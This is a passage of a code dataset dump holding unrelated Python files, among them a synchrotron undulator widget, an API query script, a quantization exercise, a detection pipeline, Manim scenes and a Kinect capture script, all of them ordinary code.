\"DISTANCE\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 11 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"GAPH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 12 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"GAPV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 13 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"HSLITPOINTS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 14 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"VSLITPOINTS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 15 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.comboBox(box1, self, \"METHOD\",\n label=self.unitLabels()[idx], addSpace=True,\n items=['US', 'URGENT', 'SRW'],\n valueType=int, orientation=\"horizontal\")\n self.show_at(self.unitFlags()[idx], box1) \n\n gui.rubber(self.controlArea)\n\n def unitLabels(self):\n return [\"Electron Energy [GeV]\", \"Electron Energy Spread\", \"Electron Current [A]\", \"Electron Beam Size H [m]\", \"Electron Beam Size V [m]\", \"Electron Beam Divergence H [rad]\", \"Electron Beam Divergence V [rad]\", \"Period ID [m]\", \"Number of 
periods\", \"Kv [undulator K value vertical field]\", \"Distance to slit [m]\", \"Slit gap H [m]\", \"Slit gap V [m]\", \"Number of slit mesh points in H\", \"Number of slit mesh points in V\", \"calculation code\"]\n\n\n def unitFlags(self):\n return [\"True\", \"self.METHOD != 1\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\"]\n\n\n #def unitNames(self):\n # return [\"ELECTRONENERGY\", \"ELECTRONENERGYSPREAD\", \"ELECTRONCURRENT\", \"ELECTRONBEAMSIZEH\", \"ELECTRONBEAMSIZEV\", \"ELECTRONBEAMDIVERGENCEH\", \"ELECTRONBEAMDIVERGENCEV\", \"PERIODID\", \"NPERIODS\", \"KV\", \"DISTANCE\", \"GAPH\", \"GAPV\", \"HSLITPOINTS\", \"VSLITPOINTS\", \"METHOD\"]\n\n\n def compute(self):\n fileName = xoppy_calc_undulator_power_density(ELECTRONENERGY=self.ELECTRONENERGY,ELECTRONENERGYSPREAD=self.ELECTRONENERGYSPREAD,ELECTRONCURRENT=self.ELECTRONCURRENT,ELECTRONBEAMSIZEH=self.ELECTRONBEAMSIZEH,ELECTRONBEAMSIZEV=self.ELECTRONBEAMSIZEV,ELECTRONBEAMDIVERGENCEH=self.ELECTRONBEAMDIVERGENCEH,ELECTRONBEAMDIVERGENCEV=self.ELECTRONBEAMDIVERGENCEV,PERIODID=self.PERIODID,NPERIODS=self.NPERIODS,KV=self.KV,DISTANCE=self.DISTANCE,GAPH=self.GAPH,GAPV=self.GAPV,HSLITPOINTS=self.HSLITPOINTS,VSLITPOINTS=self.VSLITPOINTS,METHOD=self.METHOD)\n #send specfile\n self.send(\"xoppy_specfile\",fileName)\n\n print(\"Loading file: \",fileName)\n #load spec file with one scan, # is comment\n out = np.loadtxt(fileName)\n print(\"data shape: \",out.shape)\n #get labels\n txt = open(fileName).readlines()\n tmp = [ line.find(\"#L\") for line in txt]\n itmp = np.where(np.array(tmp) != (-1))\n labels = txt[itmp[0]].replace(\"#L \",\"\").split(\" \")\n print(\"data labels: \",labels)\n #\n # build and send orange table\n #\n domain = Domain([ ContinuousVariable(i) for i in labels ])\n table = Table.from_numpy(domain, out)\n self.send(\"xoppy_table\",table)\n\n def defaults(self):\n self.resetSettings()\n self.compute()\n return\n\n def help1(self):\n print(\"help pressed.\")\n xoppy_doc('undulator_power_density')\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = OWundulator_power_density()\n w.show()\n app.exec()\n w.saveSettings()\n","sub_path":"devel/undulators/undulator_power_density.py","file_name":"undulator_power_density.py","file_ext":"py","file_size_in_byte":10299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"136183600","text":"import json\nimport requests\nfrom pprint import PrettyPrinter\npp = pprint.PrettyPrinter(indent=4)\n\nlimit= 10000\noffset = 0\nsnapshot = 304634\nbase64auth = 'your base64 auth combo of user and apikey'\n\nnqe = '''foreach device in network.devices\nforeach line in device.files.config\nforeach child in line.children\nlet match = patternMatch(child.text, `vxlan vlan {vlan:string} flood vtep {ips:(string*)}`)\nwhere isPresent(match)\nselect {\n deviceName: device.name,\n line: child.text,\n vlan: match.vlan,\n ip: match.ips\n}'''\n\nurl = \"https://fwd.app/api/snapshots/%s/nq\" % (snapshot)\nheaders = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Basic %s' %(base64auth)}\npayload = '{\"query\": \"% s\",\"queryOptions\":{\"offset\": %s,\"limit\": %s }}' % (nqe, offset, limit)\npayload = payload.replace('\\n', '\\\\n')\nresponse = requests.request(\"POST\", url, headers=headers, data = payload).json()\npp.pprint 
(response)\n","sub_path":"examples/nqe-api-vxlanflood.py","file_name":"nqe-api-vxlanflood.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"238894234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 17 16:08:53 2016\n\n@author: Administrator\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io.wavfile as wav\n\n\ndef TabelasMidRise(nBits, vMax):\n delta = 2.*vMax / 2.**nBits\n vQ = np.arange(-vMax+delta/2., vMax, delta)\n vD = np.arange(-vMax + delta, vMax - delta/2, delta)\n return vQ, vD\n\ndef Quantificador(vQ, vD, fx):\n vMaxp = np.max(fx) # Amplitude maxima do sinal fx\n vMaxn = np.min(fx) # Amplitude minima do sinal fx\n meioDelta = np.abs(vQ[0] - vQ[1]) / 2\n \n # Condição que veririfica se ambas as aplitudes estão contidas no vQ\n if(vMaxp > vQ[-1] + meioDelta or vMaxn < vQ[0] - meioDelta):\n if(vMaxp > np.abs(vMaxn)):\n vQ, vD = TabelasMidRise(np.log2(len(vQ)), vMaxp)\n else:\n vQ, vD = TabelasMidRise(np.log2(len(vQ)), np.abs(vMaxn))\n\n # Array de valores quantificados\n fq = np.ones(len(fx), dtype=float) * vQ[-1]\n # Array dos idices da tabela de quantificação referentes aos valores quantificados\n fi = np.ones(len(fx), dtype=float) * len(vQ) - 1\n for i in range(len(fx)):\n arrayBin = fx[i] <= vD\n arrTrue = np.where(arrayBin == True)[0]\n if(len(arrTrue) > 0):\n fq[i] = vQ[arrTrue[0]]\n fi[i] = arrTrue[0]\n return fq, fi \n\ndef tabelasmidtread(nBits, vMax):\n delta = 2. * vMax / 2.**nBits\n quantificacionValues = np.arange(-vMax + (delta), vMax + delta, delta)\n decisionValues = np.arange(-vMax + (delta), vMax + (delta - (delta / 2)), delta)\n return quantificacionValues, decisionValues, delta\n\ndef SNR(signalIn, R, vMax):\n vMax = np.max(signalIn)\n quanti, deci = TabelasMidRise(R, vMax)\n signalOut, used = Quantificador(signalIn, quanti, deci)\n Px = np.sum([(signalIn**2) / 2])\n PRuido = vMax**2 / (3 * (2**(2 * R)))\n SNRT = 6. * R + 10. * np.log10((3. * Px) / (vMax**2))\n SNRP = 10. * np.log10(Px / PRuido)\n return SNRT, SNRP\n \ndef main():\n # exercicio 3\n # a)\n vMax = 20\n fx = np.arange(-vMax, vMax + .5, 0.5)\n nBits = 3\n vQ, vD = TabelasMidRise(nBits, vMax)\n print(\"fx\", fx)\n print(\"Q\", vQ)\n print(\"D\", vD)\n fq, fi = Quantificador(vQ, vD, fx)\n print(\"fq\", fq)\n print(\"fi\", fi)\n plt.plot(fq)\n plt.plot(fx)\n \n # b)\n eq = fx - fq\n plt.figure()\n plt.plot(eq)\n plt.figure()\n hx, b = np.histogram(eq, 10)\n plt.bar(b[:-1], hx, width=.20 , color=[.9, .9, .9])\n \n # c)\n vMax = 20.\n fx = np.arange(-vMax, vMax + .5, 0.5)\n p = sum(fx * fx) / len(fx)\n R = np.arange(3,9,1)\n SNRT = np.arange(len(R), dtype='float')\n SNRP = np.arange(len(R), dtype='float')\n \n for i in range(len(R)):\n vQ, vD = TabelasMidRise(R[i], vMax)\n print(\"fx\", fx)\n print(\"Q\", vQ)\n print(\"D\", vD)\n fq, fi = Quantificador(vQ, vD, fx)\n print(\"fq\", fq)\n print(\"fi\", fi)\n plt.figure()\n plt.plot(fq)\n plt.plot(fx)\n eq = fx - fq\n peq = sum(eq * eq) / len(eq)\n SNRT[i] = 6. * R[i] + 10. * np.log10((3. * p) / (vMax**2))\n SNRP[i] = 10. 
* np.log10(p/peq)\n    \n    plt.figure()\n    plt.plot(R, SNRT)\n    plt.plot(R, SNRP)\n    \n    # exercise 4\n    # a)\n    #rate, data = wav.read(\"D:/LEIM/3_Semestre/CPS/pythonWorkspace_1617/wavFiles/guitarra.wav\", \"r\")\n","sub_path":"trabalhoPratico02/trabalho_pratico02.py","file_name":"trabalho_pratico02.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"603643196","text":"import sys\nsys.path.append('luadata')\nimport luadata\n\nimport xml.etree.ElementTree as ET\nimport io\nimport glob\n# load xml\n\npatetc={\n    \"SKL_SET_TARGET_CIRCLE\":\"Circle\",\n    \"SKL_SET_TARGET_SQUARE\": \"Square\",\n    \"SKL_SET_TARGET_FAN\": \"Fan\",\n}\npatfrm={\n    \"CIRCLE\":\"Circle\",\n    \"SQUARE\": \"Square\",\n    \"FAN\": \"Fan\",\n}\nPSEUDOFORECAST_DATA = {}\nfilelist=glob.glob(\"E:\\\\Analyze\\\\newtos\\\\extract\\\\skill_bytool.ipf\\\\*.xml\")\nfor filename in filelist:\n    with open(filename,encoding='utf_8') as f:\n        data=f.read()\n\n    root=ET.fromstring(data)\n    #skills = root[0]\n    def pick(attr,name):\n        if name in attr:\n            return attr[name]\n        else:\n            return 0\n    def skilltable(frm,mode):\n        if mode==\"MainSkl\":\n            #print(str(pick(frm.attrib,\"Name\")))\n            return {\n                \"timestart\":int(pick(frm.attrib,\"Time\")),\n                \"timeend\":int(pick(frm.attrib,\"AniTime\")),\n                \"angle\":float(pick(frm.attrib,\"SklAngle\")),\n                \"width\":float(pick(frm.attrib,\"Width\")),\n                \"length\":float(pick(frm.attrib,\"Length\")),\n                \"typ\": patfrm[pick(frm.attrib, \"Type\")],\n                \"rotate\":float(pick(frm.attrib,\"RotAngle\")),\n                \"dist\": float(pick(frm.attrib, \"Dist\")),\n                \"postype\": int(pick(frm.attrib, \"PosType\")),\n                \"mode\":mode\n            }\n        elif mode==\"Scp\":\n            return {\n                \"timestart\":0,\n                \"timeend\":1,\n                \"angle\": float(pick(frm.attrib, \"SklAngle\")),\n                \"width\": float(pick(frm.attrib, \"Width\")),\n                \"length\": float(pick(frm.attrib, \"Length\")),\n                \"typ\": patetc[pick(frm.attrib, \"Type\")],\n                \"rotate\":float(pick(frm.find(\"Pos\").attrib,\"RotAngle\")),\n                \"mode\":mode\n            }\n        return {}\n    for skill in root:\n        #if( skill.attrib[\"Name\"].startswith(\"Mon_\")):\n        #    continue\n        #if (skill.attrib[\"Name\"].find(\" \")!=-1 or skill.attrib[\"Name\"].find(\"-\")!=-1):\n        #    continue\n        mainskil=skill.find(\"MainSkl\")\n        # compare against None: an Element with no children is falsy\n        if mainskil is not None:\n            hitlist=mainskil.find(\"HitList\")\n            if hitlist is not None:\n                frms = hitlist.findall(\"Frame\")\n                for frm in frms:\n                    name = skill.attrib[\"Name\"]\n                    name=name.replace(\"-\",\"_\")\n                    if(not name in PSEUDOFORECAST_DATA):\n                        PSEUDOFORECAST_DATA[name]=[]\n\n                    PSEUDOFORECAST_DATA[name].append(skilltable(frm,\"MainSkl\"))\n    #        etclist = mainskil.find(\"EtcList\")\n    #        if (etclist):\n    #            scps = etclist.findall(\"Scp\")\n    #            for scp in scps:\n    #                if(pick(scp.attrib,\"Scp\")==\"SKL_SET_TARGET_CIRCLE\"):\n    #\n    #                    if (not pick(skill.attrib,\"Scp\") in PSEUDOFORECAST_DATA):\n    #                        PSEUDOFORECAST_DATA[skill.attrib[\"Name\"]] = []\n    #                    PSEUDOFORECAST_DATA[skill.attrib[\"Name\"]].append(skilltable(scp,\"Scp\"))\n\nluadata.serialize(PSEUDOFORECAST_DATA, \"skills.lua\")\nwith open(\"skills.lua\",\"a\") as f:\n    f.write(\"\\nPSEUDOFORECAST_rawdata=data\")","sub_path":"_stockyard/pseudoforecast/converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"454664346","text":"# Run detection on a COCO-format dataset\r\n# With two separate configurations for the detectors\r\nraise Exception('Not updated with new detection 
interface')\r\nimport argparse, json, pickle\r\n\r\nfrom os.path import join, isfile, basename\r\nfrom glob import glob\r\n\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport torch\r\nimport mmcv\r\n\r\nfrom mmdet.models import build_detector\r\nfrom mmdet.apis import init_detector, inference_detector\r\n\r\nfrom pycocotools.coco import COCO\r\nimport pycocotools.mask as maskUtils\r\n\r\nimport sys; sys.path.insert(0, '..'); sys.path.insert(0, '.')\r\nfrom util import mkdir2\r\nfrom dbcode.dbinfo import coco2av, coco2kmots, kmots_classes, av_classes\r\nfrom det import parse_mmdet_result, vis_det, eval_ccf\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data-root', type=str, required=True)\r\n parser.add_argument('--annot-path', type=str, required=True)\r\n parser.add_argument('--det1-stride', type=float, default=None)\r\n parser.add_argument('--det1-in-scale', type=float, required=True)\r\n parser.add_argument('--det2-in-scale', type=float, required=True)\r\n parser.add_argument('--no-mask', action='store_true', default=False)\r\n parser.add_argument('--out-dir', type=str, required=True)\r\n parser.add_argument('--vis-dir', type=str, default=None)\r\n parser.add_argument('--vis-scale', type=float, default=1)\r\n parser.add_argument('--config', type=str, required=True)\r\n parser.add_argument('--weights', type=str, required=True)\r\n\r\n # parser.add_argument('--config', type=str, default='../mmdetection/configs/htc/htc_dconv_c3-c5_mstrain_400_1400_x101_64x4d_fpn_20e.py')\r\n # parser.add_argument('--weights', type=str, default='/data/mengtial/ModelZoo/mmdet/htc_dconv_c3-c5_mstrain_400_1400_x101_64x4d_fpn_20e_20190408-0e50669c.pth')\r\n # parser.add_argument('--config', type=str, default='../mmdetection/configs/mask_rcnn_r50_fpn_1x.py')\r\n # parser.add_argument('--weights', type=str, default='/data/mengtial/ModelZoo/mmdet/mask_rcnn_r50_fpn_2x_20181010-41d35c05.pth')\r\n \r\n parser.add_argument('--no-eval', action='store_true', default=False)\r\n parser.add_argument('--overwrite', action='store_true', default=False)\r\n\r\n opts = parser.parse_args()\r\n return opts\r\n\r\ndef main():\r\n assert torch.cuda.device_count() == 1 # mmdet only supports single GPU testing\r\n\r\n opts = parse_args()\r\n\r\n mkdir2(opts.out_dir)\r\n vis_out = bool(opts.vis_dir)\r\n if vis_out:\r\n mkdir2(opts.vis_dir)\r\n\r\n db = COCO(opts.annot_path)\r\n n_class = len(db.cats)\r\n seqs = db.dataset['sequences']\r\n seq_dirs = db.dataset['seq_dirs']\r\n if 'KMOTS' in opts.data_root:\r\n class_mapping = coco2kmots\r\n class_names = kmots_classes\r\n elif 'ArgoVerse' in opts.data_root:\r\n class_mapping = coco2av\r\n class_names = av_classes\r\n else:\r\n raise Exception('Unknown dataset')\r\n\r\n config = mmcv.Config.fromfile(opts.config)\r\n # mainly for SSD\r\n config.data.test.resize_keep_ratio = True\r\n if opts.no_mask:\r\n if 'mask_head' in config.model:\r\n config.model['mask_head'] = None\r\n\r\n model = init_detector(config, opts.weights)\r\n model.eval()\r\n\r\n results_ccf = []\r\n\r\n for iid, img in tqdm(db.imgs.items()):\r\n img_name = img['name']\r\n\r\n sid = img['sid']\r\n seq_name = seqs[sid]\r\n\r\n img_path = join(opts.data_root, seq_dirs[sid], img_name)\r\n I = mmcv.imread(img_path)\r\n \r\n if iid % opts.det1_stride == 0:\r\n model.cfg.data.test.img_scale = opts.det1_in_scale\r\n else:\r\n model.cfg.data.test.img_scale = opts.det2_in_scale\r\n\r\n result = inference_detector(model, I)\r\n bboxes, scores, labels, masks = 
parse_mmdet_result(result, class_mapping, n_class)\r\n\r\n if vis_out:\r\n vis_path = join(opts.vis_dir, seq_name, img_name[:-3] + 'jpg')\r\n if opts.overwrite or not isfile(vis_path):\r\n vis_det(\r\n I, bboxes, labels,\r\n class_names, masks, scores,\r\n out_scale=opts.vis_scale,\r\n out_file=vis_path\r\n )\r\n\r\n # convert to coco fmt\r\n bboxes[:, 2:] -= bboxes[:, :2]\r\n bboxes = bboxes.tolist()\r\n\r\n for i in range(len(bboxes)):\r\n result_dict = {\r\n 'image_id': iid,\r\n 'bbox': bboxes[i],\r\n 'score': scores[i],\r\n 'category_id': labels[i],\r\n }\r\n if masks is not None:\r\n result_dict['segmentation'] = masks[i]\r\n results_ccf.append(result_dict)\r\n\r\n out_path = join(opts.out_dir, 'results_ccf.pkl')\r\n if opts.overwrite or not isfile(out_path):\r\n pickle.dump(results_ccf, open(out_path, 'wb'))\r\n\r\n if not opts.no_eval:\r\n eval_summary = eval_ccf(db, results_ccf)\r\n out_path = join(opts.out_dir, 'eval_summary.pkl')\r\n if opts.overwrite or not isfile(out_path):\r\n pickle.dump(eval_summary, open(out_path, 'wb'))\r\n\r\n if vis_out:\r\n print(f'python vis/make_videos.py \"{opts.vis_dir}\"')\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"argo_data_scripts/det/det_2cfg.py","file_name":"det_2cfg.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282678935","text":"import re\nimport os\nfrom pathlib import Path\n\nprefix = \"\\\\\".join(os.getenv('MINGW_PREFIX','C:\\\\msys64\\\\mingw64').split('/')[:-1]) + '\\\\'\nprefix = prefix.replace('\\\\','\\\\\\\\') # needed for regex\n\npkgdir = os.getenv(\"pkgdir\").replace('/','\\\\')\n\nreg = re.compile(f'(?PINSTALL(\\S*)) = {prefix}(?P\\S*)')\n\ndef do(a: re.Match):\n return f\"{a.group('key')} = {a.group('value')}\"\n\nwith open('Makefile') as f:\n c = f.read()\n c = reg.sub(do,c)\nwith open('Makefile','w') as f:\n f.write(c)\n","sub_path":"mingw-w64-perl-win32-console/patchmakefile.py","file_name":"patchmakefile.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"193412972","text":"\"\"\"\n.. module:: teamcontrol.control\n :platform: Unix, Windows\n :synopsis: Main application controller\n\n.. 
moduleauthor:: Caio Romao \n\n\"\"\"\n\n\nclass TeamController():\n    \"\"\"Main workflow controller for TeamControl.\n    \"\"\"\n\n    def __init__(self, scm, config, team_name=None):\n        \"\"\"Constructor.\n\n        :param scm: source control manager instance.\n        :type scm: :class:`~teamcontrol.scm.SCM`\n        :param config: configuration manager instance.\n        :type config: :class:`~teamcontrol.config.TeamControlConfig`\n        :param team_name: name of the default team to list\n        \"\"\"\n        self._team_name = team_name\n        self._team_users_map = {}\n        self._rule_team_relation = []\n        self.__scm = scm\n\n        # build internal data structures\n        for name, users, rules in config.get_teams():\n            self._team_users_map[name] = set(users)\n            for rule in rules:\n                self._rule_team_relation.append((rule, name))\n\n    def _get_interested_users(self, filename):\n        \"\"\"Retrieves a list of team members that have rules matching\n        the given filename.\n\n        :param filename: filename to test for matching rules.\n        :rtype: set.\n        \"\"\"\n        users = set()\n        for rule, team in self._rule_team_relation:\n            if rule.match(filename):\n                users |= self._team_users_map[team]\n        return users\n\n    def get_emails(self, input_data):\n        \"\"\"Parses input data and retrieves a list of users based on\n        team rules that match each filename extracted from the input\n        data.\n\n        If :attr:`_team_name` is set (through the\n        constructor :meth:`__init__`), include every member from it\n        regardless of the given data.\n\n        :param input_data: data to be parsed. Command-line parameters,\n            for example.\n        :type input_data: list\n        :rtype: set.\n        \"\"\"\n        emails = set()\n        if self._team_name is not None:\n            emails = self._team_users_map.get(self._team_name, set())\n\n        changed_files = self.__scm.get_files(input_data)\n        for filename in changed_files:\n            emails |= self._get_interested_users(filename)\n\n        return emails\n","sub_path":"teamcontrol/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"81205219","text":"# coding=utf-8\n\nimport os, sys\nimport unittest\nfrom HTMLTestRunner import HTMLTestRunner\n\n\nif __name__ == \"__main__\":\n    # Build the test suite\n    #testsuit = unittest.TestSuite()\n\n    #testsuit.addTest(unittest.makeSuite(SubBaidu.Baidu))\n\n    # Define where the test report is stored\n    report_file = 'Report_Screenshot.html' # fixed file name\n    # report_file = 'result_C-APP' + str(datetime.now().strftime('%Y%m%d_%H%M%S')) + '.html' # file name with a timestamp, accurate to the minute (e.g. result_20171009_1505.html)\n\n    fp = open(report_file, 'wb')\n\n    # Define the test report\n    print(\"HTML_Report.....\")\n    runner = HTMLTestRunner(stream=fp,\n                            title='DEMO Testing',\n                            description='Result:',\n                            verbosity=2)\n    test_app = \"./Test_case\"\n    discover = unittest.defaultTestLoader.discover(test_app, pattern='Sub_*.py')\n    runner.run(discover)\n\n    # Close the test report\n    fp.close()\n","sub_path":"selenium_python自动化实战(练习)/HTML_Report/python3/selenium_web/1.Testcase目录_存放全部脚本/run_all_test.py","file_name":"run_all_test.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"469755214","text":"\"\"\"Install VSCode Task\nThis task downloads the latest stable version\nof VSCode, unzips it and moves the extracted file\nto the Applications folder.\n\"\"\"\nfrom recipes.utils.task_logger import Logger\nimport recipes.actions.folder as folder\nimport recipes.actions.file as file\n\nFILE_NAME = 'vscode.zip'\nTMP_NAME = '.tmp'\nURL = 'https://go.microsoft.com/fwlink/?LinkID=620882'\nAPP_NAME = 'Visual 
Studio Code.app'\nAPPLICATIONS_PATH = '/Applications'\n\nlogger = Logger('VSCode')\n\n\ndef main():\n logger.start()\n\n if file.exists(APPLICATIONS_PATH + '/' + APP_NAME):\n logger.end()\n else:\n folder.recreate(TMP_NAME)\n file.download(URL, FILE_NAME, TMP_NAME)\n file.unzip(TMP_NAME + '/' + FILE_NAME)\n file.safely_move(APP_NAME, TMP_NAME, '/Applications')\n folder.remove(TMP_NAME)\n logger.end()\n","sub_path":"recipes/install_vscode.py","file_name":"install_vscode.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"97231708","text":"from manimlib.imports import *\nfrom thD7.video_scenes import *\n\nclass SS_1_Epilogue(Epilogue):\n CONFIG = {\n 'bgm': [\n r'Arryo Seco~-~Curtis Schweitzer\\\\',\n ],\n 'acknowledgement': None,\n }\n\nclass Words(Scene):\n def construct(self):\n set_gpus([0,1])\n\n words=[\n '信号与系统',\n '是众多工科的基础课程',\n '其地位其实不亚于高数、概统和线代',\n '在最初没有学这门课的时候',\n '我是有一点点害怕的',\n '但事实上其实并没有想象的那么难',\n '但由于教材、老师等原因',\n '很多内容的实质被掩盖在公式和计算之下',\n '这也是我创作这个系列的原因',\n '系列内容是基于我之前的笔记和个人的理解',\n '当然了,还参考了很多优秀的资源',\n '仅仅希望对观者有所帮助',\n '这些视频是用Manim制作的',\n '在此要特别感谢3b1b大神的开源库!',\n '另外,与3b1b不同的是',\n '这不是科普视频',\n '我觉得还是挺硬核的',\n '不过我觉得',\n '与其说Grant Sanderson是数学的科普者',\n '他更像是数学的布道者!'\n ]\n\n words_g=VGroup(*[TextMobject(i) for i in words])\n\n self.play(Write(words_g[0]))\n for i,k in enumerate(words_g):\n if i == 0:\n continue\n self.wait(2)\n self.play(FadeOut(words_g[i-1]),Write(k))\n\n\nclass Series(Scene):\n def construct(self):\n set_gpus([0,1])\n\n title=Title('\\\\LARGE Signals and Systems Series')\n self.play(Write(title))\n\n series_titles=[\n '\\\\sz{1} Time-Invariant Property of Systems',\n '\\\\sz{2} Understanding Convolution',\n '\\\\sz{3} Calculating Convolution',\n '\\\\sz{4} From Fourier Series to Fourier Transformation',\n '\\\\sz{5} Periodic Fourier Transformation and Sampling',\n '\\\\sz{6} Laplace Transformation',\n '\\\\sz{7} Pole-zero Diagrams and Frequency Response'\n ]\n series=VGroup(\n *[TextMobject('\\\\# '+i) for i in series_titles]\n ).arrange(DOWN,buff=0.2)\\\n .set_y((title.get_bottom()[1]-FRAME_Y_RADIUS)/2)\n left=series.get_left()\n for i in series:\n i.align_to(left,LEFT)\n\n self.play(LaggedStart(*[FadeIn(i) for i in series]),run_time=7)","sub_path":"thD7/ss/ss_0.py","file_name":"ss_0.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"328781685","text":"def t(n='', tt=''):\n\timport clipboard\n\t\"\"\"\n\t(integer, text) -> clipboard\n\tthis function take 2 arguments\n\t1- n, by default empty string\n\t2- text\n\tcombine these 2 arguments and copy the reslut to the clipboard, so you can paste to another file. 
\n\t\n\t>>> t(49, 'The Holy Quran.mp4')\n\t49_The_Holy_Quran.mp4 # Note the resul is copied to clipbord, nothing you see on your screen.\n\t\"\"\"\n\tif n:\n\t\tclipboard.copy(str(n)+\"-\"+tt.replace(' ', '_').replace(\"'\", '').strip()+'.mp4')\n\telse:\n\t\tif tt:\n\t\t\tclipboard.copy(tt.replace(' ', '_').replace(\"'\", '').strip()+'.mp4')\n\t\telse:\n\t\t\treturn \"please Enter at least one argument\"\n\n","sub_path":"python_clipboard.py","file_name":"python_clipboard.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"92464278","text":"# import the necessary modules\nimport freenect\nimport cv2\nimport numpy as np\nimport math\nimport time\nimport webbrowser\nimport Queue\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.externals import joblib\nimport os\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport sys\nimport cPickle\nfrom multiprocessing import Pool\nimport glob, ntpath\nimport featuresHOG\nimport scipy.cluster.hierarchy as hier\nimport scipy.spatial.distance as dist\nfrom matplotlib import pyplot as plt\nimport sklearn.decomposition\nimport sklearn.ensemble\nimport Image\n#framesd = Queue.Queue(20)\n#framesr = Queue.Queue(20)\nframesd = []\nframesr = []\nfd1 = []\nfr1 = []\nfd2 = []\nfr2 = []\nfd3 = []\nfr3 = []\nfd4 = []\nfr4 = []\n#import playsound\n'''working!!!'''\n\n# function to get RGB image from kinect\ndef get_video():\n array, _ = freenect.sync_get_video()\n array = cv2.cvtColor(array, cv2.COLOR_RGB2BGR)\n return array\n\n\n# function to get depth image from kinect\ndef get_depth(flag):\n global framesd, framesr\n loopnum = 0\n i = 0\n #flag = 0\n while(True):\n print(loopnum)\n depth, _ = freenect.sync_get_depth() #depth is a numpy array which stores the depth value of each pixel captured\n rgbframes, _ = freenect.sync_get_video() #rgbframes is a numpy array which stores rgb value of each pixel captured\n rgbframes = cv2.cvtColor(rgbframes, cv2.COLOR_RGB2BGR) \n #print(depth)\n depth_mask = np.where(depth < 650, 255, 0).astype(np.uint8)\n cv2.imshow('Segmented Image', depth_mask)\n cv2.imshow('RGB', rgbframes)\n for i in range(depth_mask.shape[0]):\n for j in range(depth_mask.shape[1]):\n if depth_mask[i][j]==255:\n flag = 1\n cv2.waitKey(100)\n break\n if flag == 1:\n break\n if flag == 1:\n framesd.append(depth_mask)\n framesr.append(rgbframes)\n loopnum = loopnum+1\n cv2.waitKey(100)\n if(loopnum==20):\n break\n print('$$$$$')\n \n \ndef masking(ind):\n global fd1, fr1, fd2, fr2, fd3, fr3, fd4, fr4\n #frameNumd = 0\n #print(ind)\n if ind == 1:\n framesd = fd1\n framesr = fr1\n frameNumd = 0\n frameNumr = frameNumd\n if ind == 2:\n framesd = fd2\n framesr = fr2\n frameNumd = 5\n frameNumr = frameNumd\n if ind == 3:\n framesd = fd3\n framesr = fr3\n frameNumd = 10\n frameNumr = frameNumd\n if ind == 4:\n framesd = fd4\n framesr = fr4\n frameNumd = 15\n frameNumr = frameNumd\n m = 0\n print(framesd[m].shape)\n while(m<5):\n depth_mask=framesd[m]\n rgbframes=framesr[m]\n #print(ind)\n #print('m=', m, 'ind=', ind)\n mask = np.zeros(rgbframes.shape, np.uint8)\n a, b = depth_mask.shape\n #print('ind=', ind, 'm=', m, a, b)\n for i in range(a):\n for j in range(b):\n if(depth_mask[i][j] == 255):\n mask[i][j][0] = 1\t\n mask[i][j][1] = 1\n mask[i][j][2] = 1\n thresh1=depth_mask.copy() \n \n masked_image = np.multiply(mask,rgbframes)\n print(m)\n \n #cv2.imshow('Thresholded', thresh1)\n frameNumd = 